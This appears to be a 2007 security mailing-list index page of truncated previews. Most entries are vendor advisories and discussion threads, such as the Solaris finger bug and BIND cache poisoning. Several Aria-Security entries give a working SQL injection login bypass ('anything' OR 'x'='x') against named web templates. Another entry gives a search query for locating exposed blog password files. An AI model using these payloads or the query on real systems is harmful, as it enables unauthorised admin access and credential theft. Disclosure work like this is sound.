FLEA-2007-0035-1: libvorbis

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0035-1 Published: 2007-07-27 Rating: Moderate Updated Versions: libvorbis=/[EMAIL PROTECTED]:devel//1/1.2.0-0.1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.6-4 References: http://cve.mitre.

Solaris finger bug

Hi all: Recently, we monitored a cracker from Eastern Europe, who ran 'finger [EMAIL PROTECTED]' against a Solaris 7 box, and got the following result: Login Name TTY IdleWhenWhere daemon ??? < . . . . > bin ??? pts/1xxx.lbl.g

Re: "BIND 9 DNS Cache Poisoning" by Amit Klein (Trusteer)

I'm put in an awkward position of having to respond to a message which wasn't sent to me in the first place. But still... "This bug was reported over and over again" - I find this statement confusing. The bug class of "DNS transaction ID not being random enough" was sure reported for several D

Re: Solaris finger bug

Jim Mellander wrote: Does anyone know of other platforms which exhibit this odd behavior? No, I think this is a Solaris-particular bug. I'd suggest to block finger requests to these old[1] hosts, or turn off the finger daemon alltogether... Joep [1] After all, Solaris 7 is from '98...

Berthanas Ziyaretci Defteri v2.0 (tr) Sql

Olmek Var$a Kaderde Dert Ekleme Derdine Team :) ### Portal:Berthanas Ziyaretci Defteri v2.0 (tr) Sql İnjection Bug Author:Yollubunlar http://yollubunlar.org ##

WebStore - Online Store Application Template SQL INJECTION

__ A R I A - S E C U R I T Y _ WebStore - Online Store Application Template SQL INJECTION Vendor: http://www.codewidgets.com http://target.com/PATH/sign_in.aspx Username: admin Password: anything' OR 'x'='x Credits: Aria-Security Team http://aria

Real Estate listing website application template SQL Injection

__ A R I A - S E C U R I T Y __ Real Estate listing website application template SQL Injection Vendor: http://www.codewidgets.com Username: admin Password: anything' OR 'x'='x Credits: Aria-Security Team http://aria-security.net http://outlaw.aria

Pay Roll - Time Sheet and Punch Card Application With Web Interface SQL Injection

__ A R I A - S E C U R I T Y _ Pay Roll - Time Sheet and Punch Card Application With Web Interface SQL Injection Vendor: http://www.codewidgets.com http://target.com/PATH/login.asp Username: admin Password: anything' OR 'x'='x Credits: Aria-Secu

Message Board / Threaded Discussion Forum SQL INJECTION

__ A R I A - S E C U R I T Y _ Message Board / Threaded Discussion Forum SQL INJECTION Vendor: http://www.codewidgets.com http://target.com/PATH/sign_in.aspx Username: admin Password: anything' OR 'x'='x Credits: Aria-Security Team http://aria-se

PHPBlogger cookie privilege escalation

PHPBlogger is a simple tool to help the creation of web blogs... Encrypted admin password and other preferences are stored on /data/pref.db You can find lots of them exposed with google search: pref password= filetype:db =] The admin panel is acessib

phpCoupon Vulnerabilities

Discovered by freeprotect.net member Vendor site: http://phpcoupon.com phpCoupon is Developed to provide an affordable and easy to operate local coupon websites for local and niche directory owners and entrepreneurs seeking income opportunites. It has a securi

TSLSA-2007-0023 - multi

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Trustix Secure Linux Security Advisory #2007-0023 Package names: bind, clamav, curl, mod_perl, perl-net-dns, php, tcpdump Summary: Multiple vulnerabilities Date

Re: Anti XSS AJAX

On Jul 26, 2007, at 2:28 AM, Fady Anwar wrote: A white paper about how to counter attack XSS attacks using AJAX programming techniques http://barmagy.com/blogs/infinite_loop/archive/2007/07/20/498.aspx Failed assumptions = Flawed solutions. Signing

SuskunDuygular - yelik Sistemi v.1 Sql

### Olmek Var$a Kaderde Dert Ekleme Derdine Team :) ### Portal:SuskunDuygular - Üyelik Sistemi v.1 Sql İnjection Bug Author:Yollubunlar http://

WebEvents: Online Event Registration Template Username Fields SQL INJECTION

__ A R I A - S E C U R I T Y _ WebEvents: Online Event Registration Template Username Field SQL Injection Vendor: http://www.codewidgets.com http://target.com/PATH/sign_in.aspx Username: admin Password: anything' OR 'x'='x Credits: Aria-Security

WebEvents: Online Event Registration Template Username Fields SQL INJECTION

__ A R I A - S E C U R I T Y _ WebEvents: Online Event Registration Template Username Field SQL Injection Vendor: http://www.codewidgets.com http://target.com/PATH/sign_in.aspx Username: admin Password: anything' OR 'x'='x Credits: Aria-Security

[ GLSA 200707-12 ] VLC media player: Format string vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

Friend Script 2.5 - 2.4 Remote File İnclude

### Olmek Var$a Kaderde Dert Ekleme Derdine Team :) ### Portal:Friend Script 2.5 - 2.4 Remote File İnclude Vulnerable Author:Yollubunlar http:/

[ GLSA 200707-13 ] Fail2ban: Denial of Service

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -